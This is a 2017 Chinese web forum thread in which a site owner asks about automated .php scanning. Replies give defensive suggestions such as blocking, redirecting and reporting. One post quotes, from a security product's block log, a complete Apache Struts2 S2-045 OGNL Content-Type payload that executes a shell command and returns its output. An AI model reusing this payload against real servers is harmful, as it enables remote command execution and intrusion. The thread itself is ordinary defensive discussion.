1
10467106 2017-08-26 16:59:44 +08:00 via iPhone
可以关站
|
2
UnisandK 2017-08-26 17:00:53 +08:00
自动扫描的吧
|
3
ETiV 2017-08-26 17:02:19 +08:00 via iPhone
可能没人蓄意攻击你,都是自动扫的
可以把\.php$的日志关了 |
4
wwqgtxx 2017-08-26 17:07:31 +08:00 via iPhone
在前端( nginx )上直接把所有.php 返回 503 就好了
|
5
xiayibu OP 安全狗提示这种攻击
拦截原因: HTTP 头部字段:HTTP_CONTENT-TYPE 包含内容:{(#Normal='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} |
6
fzleee 2017-08-26 18:22:00 +08:00 via iPhone
redirect 到某些不可访问的网站
|
7
jugelizi 2017-08-26 18:26:05 +08:00
很正常
我 java 站每天海内外的 php 请求 php 站的 asp 请求 |
8
Felldeadbird 2017-08-26 21:35:28 +08:00 via iPhone
这种都是脚本批量检测的。
|
9
ferock 2017-08-26 22:50:44 +08:00
告诉对方,你的网站不是 php !
|
10
Sanko 2017-08-26 23:31:16 +08:00 via Android 1
HttpResponse('哈麻批劳资是 python')
|
11
zingl 2017-08-27 02:39:22 +08:00
向 ip 拥有者举证投诉
|
12
ysc3839 2017-08-27 05:11:40 +08:00 via Android 1
听说过这样事,静态站,总有人扫 php,于是站长就把 php 全都重定向到一个很大的文件,比如 VPS 的测速文件。
|
13
KgM4gLtF0shViDH3 2017-08-27 08:56:47 +08:00 via Android
可能是新手在学 sqlmap ?
|
15
kylinking 2017-08-27 09:14:52 +08:00 via iPhone
@xiayibu 这不是 PHP 注入攻击,而是针对前段时间的 S2-045 漏洞,一般都是批量扫描的,发现有漏洞后会下载一些挖矿样本或者 DDoS 程序。
|
16
fcka 2017-08-27 10:11:58 +08:00 via Android
看看来源 ip,可能是阿里云的云盾干的……
|
17
bearqq 2017-08-27 10:20:55 +08:00
@application.route('<p:re:.*>')
def other(p): if ('php' in request.environ.get('bottle.raw_path')) or (request.environ.get('REMOTE_ADDR') in config.blacklist): return redirect('http://cachefly.cachefly.net/100mb.test') else: abort(404) |
18
xinxin9527 2017-09-18 14:36:00 +08:00
应该是自动扫描的,现在好多平台不间断的在全网扫描漏洞,并收入漏洞库,存在这种可能性。
只要不影响主站访问,也倒没有什么,但如果题主看着觉得糟心,可以使用云防御来防护也是不错的。 比如:知道创宇抗 D 保、百度云加速、前期网站访问量小,可以使用免费套餐的就够用了哈 |